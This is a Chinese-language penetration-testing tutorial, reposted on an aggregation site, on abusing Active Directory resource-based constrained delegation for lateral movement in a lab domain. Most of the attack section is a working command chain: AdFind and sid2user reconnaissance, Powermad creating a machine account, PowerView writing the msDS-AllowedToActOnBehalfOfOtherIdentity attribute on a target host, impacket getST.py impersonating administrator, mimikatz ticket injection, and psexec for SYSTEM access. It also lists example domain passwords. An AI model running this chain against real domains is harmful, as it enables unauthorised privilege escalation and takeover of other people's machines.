内网横向移动—资源约束委派

内网横向移动—资源约束委派

  • 1. 资源约束委派
    • 1.1. 基于资源的约束委派的优势
    • 1.2. 约束性委派和基于资源的约束性委派配置的差别
    • 1.3. 利用条件
      • 1.3.1. 什么用户能够修改msDS-AllowedToActOnBehalfOfOtherIdentity属性
      • 1.3.2. 将机器加入域的域用户
  • 2. 案例操作
    • 2.1. 获取目标信息
      • 2.1.1. 查询SID值
      • 2.1.2. 查询加入的用户
    • 2.2. 攻击操作
      • 2.2.1. 增加机器
      • 2.2.2. 查看增加情况
      • 2.2.3. 获取SID
      • 2.2.4. 修改委派属性
      • 2.2.5. 验证是否修改成功
      • 2.2.6. 清除属性值设置(千万别实验,只了解)
    • 2.3. 票据生成
      • 2.3.1. 配置host文件
      • 2.3.2. 连接目标获取票据
      • 2.3.3. 导入票据到内存
      • 2.3.4. 利用票据连接
  • 3. 总结

1. 资源约束委派

  资源约束委派主要是为了让用户或者资源更加的独立,所以在Windows server 2012中引入了基于资源的约束委派,基于资源的约束委派允许资源配置受信任的帐户委派给他们。基于资源的约束委派将委派的控制权交给拥有被访问资源的管理员。

  同时利用基于资源的约束委派的控制权交给拥有被访问资源的管理员,间接导致了域内正常的域用户都有权进行委派操作。

  简单来说就是在资源约束委派中,不需要使用域内管理员去设置相关约束委派的属性,而操作权落到了当前登录的机器或者用户手里了。

  详细的可以参考下面的文章:

  域渗透之委派攻击

  这里就借用一下他人的文章中的说法,以防文章再没了。

1.1. 基于资源的约束委派的优势

  • 委派的权限授予给了拥有资源的后端,而不再是前端
  • 约束性委派不能跨域进行委派,基于资源的约束性委派可以跨域和林
  • 不再需要域管理员权限设置委派,只需拥有在计算机对象上编辑msDS-AllowedToActOnBehaffOtherldentity属性权限也就是将计算机加入域的域用户和机器自身拥有权限。

1.2. 约束性委派和基于资源的约束性委派配置的差别

  • 传统的约束委派是正向的,通过修改服务A的属性msDS-AlowedToDelegateTo,添加服务B的SPN,设置约束委派对象(服务B),服务A便可以模拟用户向域控制器请求访问服务B的ST服务票据。
  • 而基于资源的约束委派则是相反的,通过修改服务B属性msDS-AllowedToActOnBehalfOfotherldentity,添加服务A的SID,达到让服务A模拟用户访问B资源的目的。
  • msDS-AllowedToActOnBehalfOfOtherIdentity属性指向委派账户(也就是我们创建的机器账户或已知机器账户)

1.3. 利用条件

  • 具有对主机修改msDS-AllowedToActOnBehalfOfOtherIdentity属性的权限(如已经控制的主机是WEB 则具有修改WEB主机的msDS-AllowedToActOnBehalfOfOtherIdentity的权限账户)
  • 可以创建机器账户的域用户(或已知机器账户)
  • 域控是Windows server 2012及以上
  • 存在域内成员用户加入域的操作。

1.3.1. 什么用户能够修改msDS-AllowedToActOnBehalfOfOtherIdentity属性

  • 将主机加入域的用户(账户中有一个mSDS-CreatorSID属性,用于标记加入域时使用的用户的SID值,反查就可以知道是谁把机器加入域的了)
  • Account Operator组成员
  • 该主机的机器账户

1.3.2. 将机器加入域的域用户

  正常机器加入域需要输入域管账号密码,而这里不需要输入域管的账号密码,而是输入域内用户的账号密码,例如:域控的账号密码是:administrator/admin@123,主机A的账号密码是:dbadmin/admin!@#45,而这时候有一个新的主机要加入域,这时候输入的账号密码不能输入域控的账号密码,而是输入主机A的账号密码,这样就形成了资源约束委派,也就相当于如果我们有主机A的权限,那么后面加入的这台主机的权限我们也就间接性获取到了权限了。

  同时如果我们拿到了Account Operators组内用户权限的话,则我们可以拿到除域控外所有机器的system权限。(因为Account Operators组内用户可以修改域内任意主机(除了域控)的msDS-AllowedToActOnBehalfOfOtherIdentity属性)

2. 案例操作

  这里的委派不需要任何的设置,默认就可以,也就是设置成不信任此用户作为委派。

在这里插入图片描述

2.1. 获取目标信息

  这里我就不在CS中操作了,在CS中操作也是一样的,这里我们获取的是WEB机器的权限,而我们要攻击的则是DATA机器的权限。

2.1.1. 查询SID值

  可以看到使用Adfind工具查询,发现存在两台主机的SID值是一样的,那么就存在资源委派的可能,如果SID值不一样那就不存在资源委派的情况。

AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID
##-h 域控的IP地址,-d是域名,-f是固定的。

在这里插入图片描述

2.1.2. 查询加入的用户

  这里就是查询是谁把这两台主机加入域的,这个用户是谁?

sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104   ##要主机从5开始是将前面的S-1-去除,同时将中间的-全部替换为空格。

在这里插入图片描述

  通过查询发现,加入的用户是dbadmin,并且是域内普通用户。

2.2. 攻击操作

  这里需要使用到工具,这个工具是使用PowerShell来执行。

powermad

2.2.1. 增加机器

  其实这里我一直觉得有一个坑,CS是没交互的功能的,那么如何执行交互呢,所以可能还是需要将会话转交给msf来执行。

Set-ExecutionPolicy Bypass -Scope Process   ##更改策略
import-module .\Powermad.ps1             ##执行脚本
New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force) ##创建一个用户为test1的,然后密码是123456

在这里插入图片描述

2.2.2. 查看增加情况

  这里在实际操作中是看不到增加情况的,但是这里是演示所以可以看一下,在域控是是否增加了一个用户。

在这里插入图片描述

2.2.3. 获取SID

  这里获取新加入的这太主机的SID值,这里获取到的SID值是:S-1-5-21-1695257952-3088263962-2055235443-1602

Set-ExecutionPolicy Bypass -Scope Process  ##如果出现报错,就执行这条命令,再执行下面的命令。
Import-Module .\PowerView.ps1
Get-NetComputer test1 -Properties objectsid

在这里插入图片描述

2.2.4. 修改委派属性

  这里就是设置委派,修改DATA的属性,仔细看下面的命令,主要要修改的一个是DATA也就是你目标主机的机器名,还有一个就是SID值,这里将SID值修改为刚刚上面我们自己添加的那台主机的SID值。

Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

在这里插入图片描述

2.2.5. 验证是否修改成功

  这里然后将中间的DATA修改成你目标主机的主机名。

Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity 

在这里插入图片描述

2.2.6. 清除属性值设置(千万别实验,只了解)

  这里其实就是将之前的修改的内容给清除了,这个你删除了,就会像我一样,折腾了一个多小时发现,自己搞的问题。

Set-DomainObject DATA -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

在这里插入图片描述

2.3. 票据生成

  这里就通过票据的生成来验证,不过这里需要提前在本地使用工具生成,使用需要上传木马,设置代理。

2.3.1. 配置host文件

  这里需要提前配置一下host文件,由于使用下面会使用到机器的名,以防解析到外部的地址,所以需要配置相应的host指向,由于是利用本地的工具去生成的,所以修改host文件需要修改本地的host文件。

  这里放在本地的原因是需要使用python环境,而目标如果没有python文件,你把工具上传后也无法执行,同时该工具又有很多小工具,都未经免杀,可能上传就会被干掉。

192.168.3.11 web.xiaodi.org
192.168.3.22 data.xiaodi.org
192.168.3.33 dc.xiaodi.org
192.168.3.33 xiaodi.org

在这里插入图片描述

2.3.2. 连接目标获取票据

  这里需要使用到impacket工具,并且使用到python3.10及以上版本,可能低版本的存在一些小问题。

  impacket工具

proxychains python getST.py -dc-ip 192.168.3.33 xiaodi.local/test1\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

在这里插入图片描述

2.3.3. 导入票据到内存

  这里将刚刚生成的票据导入到内存中,由于票据是本地生成的,那么就需要先将票据上传到所控主机上后在进行导入。

mimikatz kerberos::ptc administrator.ccache

在这里插入图片描述

2.3.4. 利用票据连接

dir \\data.xiaodi.local\c$    ##默认连接,权限低。
python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass   ##可提升为system权限。

在这里插入图片描述

3. 总结

  其实总体来说,约束委派类,不是太经常遇到,同时在操作过程中,还有很多是需要交互的,或者一些特殊的操作,其中有一点不对则无法利用成功,不像其他漏洞,能不能利用基本上测试一下就能确定了,而这个有可能测试完也无法成功,上面案例中能够测试成功,均是在理想化环境中测试。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/57138.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

以产品经理的角度去讲解原型图---会议OA项目

目录 一.前言 二.原型图 2.1 原型图是什么 3.1 原型图的作用 三.演示讲解 3.1 项目背景 3.2 项目介绍 3.2.1 会议管理(会议的发起,通知) 3.2.2 投票管理(会议的流程重大决策记录) 3.2.3 会议室管理 3.2.4 系统管…

Dockerfile部署golang,docker-compose

使用go镜像打包,运行在容器内 redis和mysql用外部的 项目目录结构 w1go项目: Dockerfile # 这种方式是docker项目加上 本地的mysql和redis环境 # go打包的容器 FROM golang:alpine AS builder# 为我们镜像设置一些必要的环境变量 ENV GO111MODULEon …

python excel 操作

excel文件内容如下: 一、xlrd 读Excel 操作 1、打开Excel文件读取数据 filexlrd.open_workbook(filename)#文件名以及路径,如果路径或者文件名有中文给前面加一个 r 2、常用函数 (1)获取一个sheet工作表 table file.sheets(…

HTTP——八、确认访问用户身份的认证

HTTP 一、何为认证二、BASIC认证BASIC认证的认证步骤 三、DIGEST认证DIGEST认证的认证步骤 四、SSL客户端认证1、SSL 客户端认证的认证步骤2、SSL 客户端认证采用双因素认证3、SSL 客户端认证必要的费用 五、基于表单认证1、认证多半为基于表单认证2、Session 管理及 Cookie 应…

用P2PNet进行大豆计数

文章目录 介绍在大豆数据集上可视化结果环境准备数据集结构数据链接模型训练模型推理代码介绍 这个仓库包含了P2PNet(Rethinking Counting and Localization in Crowds: A Purely Point-Based Framework)在大豆数据集上的pytorch实现。 在大豆数据集上可视化结果 环境准备 …

iframe 标签的作用是什么?用法是什么?属性有什么?

聚沙成塔每天进步一点点 ⭐ 专栏简介⭐ iframe 标签是什么?⭐ iframe 标签的作用什么?⭐ iframe 标签的用法⭐ iframe 标签的属性⭐ 写在最后 ⭐ 专栏简介 前端入门之旅:探索Web开发的奇妙世界 记得点击上方或者右侧链接订阅本专栏哦 几何带你…

Glass指纹识别工具,多线程Web指纹识别工具-Chunsou

Glass指纹识别工具,多线程Web指纹识别工具-Chunsou。 Glass指纹识别工具 Glass一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指…

后台管理系统

1.1 项目概述 简易后台管理系统是一个基于Vue3ElemrntPlus的后台管理系统,提供了用户登录、记住密码、数据的增删改查、分页、错误信息提示等功能,旨在协助管理员对特定数据进行管理和操作。 没有后台对接,数据源为假数据。 全部代码已上传G…

Vue3+SpringBoot快速开发模板

起因:个人开发过程经常会使用到Vue3SpringBoot技术栈来开发项目,每次在项目初始化时都需要涉及一些重复的整理工作,于是结合一些个人觉得不错的前后端模板进行整合,打通一些大多数项目都需要的实现的基础功能,以便于快…

《面试1v1》ElasticSearch架构设计

🍅 作者简介:王哥,CSDN2022博客总榜Top100🏆、博客专家💪 🍅 技术交流:定期更新Java硬核干货,不定期送书活动 🍅 王哥多年工作总结:Java学习路线总结&#xf…

Butterfly安装文档(三)主题配置-1

语言 修改站点配置文件 _config.yml 默认语言是 en 主题支持三种语言 default(en)zh-CN (简体中文)zh-TW (繁体中文) 网站资料 修改网站各种资料,例如标题、副标题和邮箱等个人资料,请修改博客根目录的_config.yml 导航栏设置 (Navigation bar set…

css, resize 拖拉宽度

效果如下&#xff1a; 可直接复制预览查看属性值: 关键样式属性&#xff1a; resize: horizontal; overflow-x: auto; <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content…